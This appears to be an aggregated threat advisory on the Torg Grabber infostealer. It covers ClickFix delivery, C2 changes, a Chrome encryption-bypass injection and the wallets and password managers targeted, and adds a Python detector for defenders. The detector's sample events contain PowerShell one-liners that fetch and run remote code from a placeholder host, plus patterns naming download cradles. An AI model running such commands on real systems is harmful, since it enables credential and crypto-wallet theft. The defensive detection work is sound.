
New Torg Grabber infostealer malware targets 728 crypto wallets

Published:

25 March 2026 at 18:32:37

Alert date:

25 March 2026 at 19:06:05

Source:

bleepingcomputer.com


Ransomware & Malware, Web Technologies, Data Breach & Exfiltration

A new information stealer, Torg Grabber, targets data held by 850 browser extensions, 728 of them cryptocurrency wallets, along with password managers, 2FA extensions and a range of desktop applications. Its priority is cryptocurrency wallet credentials and other financial data, and the breadth of wallet coverage points to an operation built to maximise theft. The malware is actively spreading and is an immediate risk to anyone holding cryptocurrency in a browser or desktop wallet.

Technical details

Torg Grabber is an information stealer that targets 850 browser extensions, 728 of them cryptocurrency wallets. Initial access uses the ClickFix technique: a lure page writes a command to the victim's clipboard and instructs them to paste and run it, so the malicious PowerShell is executed by the user rather than by an exploit. Its command-and-control channel evolved from Telegram to an encrypted TCP protocol and then, on December 18, 2025, to HTTPS fronted by Cloudflare infrastructure. The stealer includes anti-analysis checks, multi-layered obfuscation, direct syscalls and reflective loading, and runs entirely in memory. An App-Bound Encryption bypass was added on December 22, 2025: a standalone tool called Underground reflectively injects a DLL into the browser so that the call to Chrome's COM Elevation Service is made from inside the browser process, and uses it to extract the master encryption keys that protect stored browser data. The C2 can also deliver shellcode, ChaCha-encrypted and zlib-compressed, for execution in memory.

Mitigation steps:

Monitor for ClickFix lures and for PowerShell launched from the Run dialog or a terminal with a clipboard-pasted command, suspicious browser extension activity, connections to newly registered C2 domains (new ones appear weekly), reflective DLL injection into browser processes, and access to Chrome's COM Elevation Service from anything other than the browser itself. The malware checks for 24 documented antivirus products before running, so the enumeration of installed security products by a freshly spawned shell is an early signal worth alerting on. Because Torg Grabber runs in memory and uses direct syscalls, rely on behavioural telemetry (process creation, remote thread and process access events) rather than file-based signatures.
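The two behaviours the paragraphs above single out, a ClickFix lure that gets the user to run PowerShell and thread injection into the browser to reach Chrome's elevation service, can be scored from process telemetry. The following is an added example, not code from the BleepingComputer article or from the Torg Grabber samples: a small Python detector run over constructed Sysmon-style events. Field names are modelled on Sysmon Event ID 1 (ProcessCreate) and Event ID 8 (CreateRemoteThread); the events, paths and example.invalid URLs are assumptions for illustration, not indicators from the source.

```python
"""Heuristic detection for the behaviours this advisory tells defenders to
monitor: ClickFix-style PowerShell launches and thread injection into
browsers. Added example; not code from BleepingComputer or from the
Torg Grabber samples. Field names follow Sysmon Event ID 1 (ProcessCreate)
and Event ID 8 (CreateRemoteThread); the sample events are constructed."""
import base64
import re
from typing import Optional

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "vivaldi.exe", "opera.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# -EncodedCommand (and its short forms) carries base64 of a UTF-16LE script
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN = re.compile(r"-(?:w(?:indowstyle)?\s+)?hidden\b|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass", re.I)
DOWNLOAD = re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|net\.webclient|start-bitstransfer)\b", re.I)
INMEMORY = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_process_create(ev: dict):
    """Score a ProcessCreate event for ClickFix traits; returns (score, reasons)."""
    reasons = []
    if basename(ev["Image"]) not in SHELLS:
        return 0, reasons
    # ClickFix lures tell the victim to paste into Win+R; the Run dialog is hosted by explorer.exe
    if basename(ev["ParentImage"]) == "explorer.exe":
        reasons.append("shell-spawned-from-explorer")
    text = ev["CommandLine"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded-command")
        text = text + " " + decoded  # scan the decoded script as well as the wrapper
    if HIDDEN.search(text):
        reasons.append("hidden-window-or-policy-bypass")
    if DOWNLOAD.search(text):
        reasons.append("download-cradle")
    if INMEMORY.search(text):
        reasons.append("in-memory-execution")
    return len(reasons), reasons


def score_remote_thread(ev: dict):
    """Flag a thread created in a browser by a non-browser image, the primitive
    behind injecting a DLL into Chrome to call its elevation service from a
    trusted process. Injection via other primitives (APC, thread hijacking)
    produces no Event ID 8, so this is a partial signal only."""
    src, tgt = basename(ev["SourceImage"]), basename(ev["TargetImage"])
    if tgt in BROWSERS and src not in BROWSERS:
        return 2, ["remote-thread-into-browser"]
    return 0, []


def detect(events, threshold: int = 2):
    """Return (id, score, reasons) for every event at or above the threshold."""
    hits = []
    for ev in events:
        if ev["EventID"] == 1:
            score, reasons = score_process_create(ev)
        elif ev["EventID"] == 8:
            score, reasons = score_remote_thread(ev)
        else:
            continue
        if score >= threshold:
            hits.append((ev["id"], score, reasons))
    return hits


# Constructed sample telemetry (not real IOCs). The encoded command is built
# the way a ClickFix lure builds it: base64 over a UTF-16LE script.
STAGE2 = "iex (irm https://example.invalid/stage2)"
STAGE2_B64 = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": "e1", "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/x.txt)"'},
    {"id": "e2", "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -nop -w hidden -enc {STAGE2_B64}"},
    {"id": "e3", "EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"id": "e4", "EventID": 8, "SourceImage": r"C:\Users\victim\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"id": "e5", "EventID": 8, "SourceImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
]

if __name__ == "__main__":
    for event_id, score, reasons in detect(SAMPLE_EVENTS):
        print(event_id, score, ", ".join(reasons))
```

Run as a script it prints the flagged events. The scoring is deliberately additive: a PowerShell launched from explorer.exe on its own does not fire, while a launch combined with a hidden window, an encoded or downloaded payload and in-memory execution does. Decoding -EncodedCommand before matching matters because a ClickFix command can keep its download cradle entirely inside the base64 UTF-16LE script, where a plain string match on the command line would miss it.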

Affected products:

25 Chromium-based browsers, including Chrome, Brave, Edge, Vivaldi and Opera
8 Firefox variants
728 cryptocurrency wallet extensions, including MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui and Solflare
103 password manager extensions, including LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, ProtonPass, Enpass, Psono, Pleasant Password Server and heylogin
2FA tools, including 2FAAuth, GAuth, TOTP Authenticator and Akamai MFA
19 note-taking apps
Discord, Telegram and Steam
VPN applications
FTP applications
Email clients
Desktop cryptocurrency wallet applications

Related links:

Related CVEs:

Related threat actors:

IOCs:

No atomic indicators (hashes, domains or IP addresses) are reproduced in this advisory; the reported campaign characteristics are:

334 unique samples compiled between December 2025 and February 2026
New command-and-control servers registered weekly
40 operator tags documented
HTTPS C2 connections routed through Cloudflare infrastructure
ChaCha-encrypted, zlib-compressed shellcode delivery

This article was created with the assistance of AI technology by Perceptive.

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: This website displays information from external sources. Perceptive accepts no responsibility for the content, accuracy or completeness of this information.
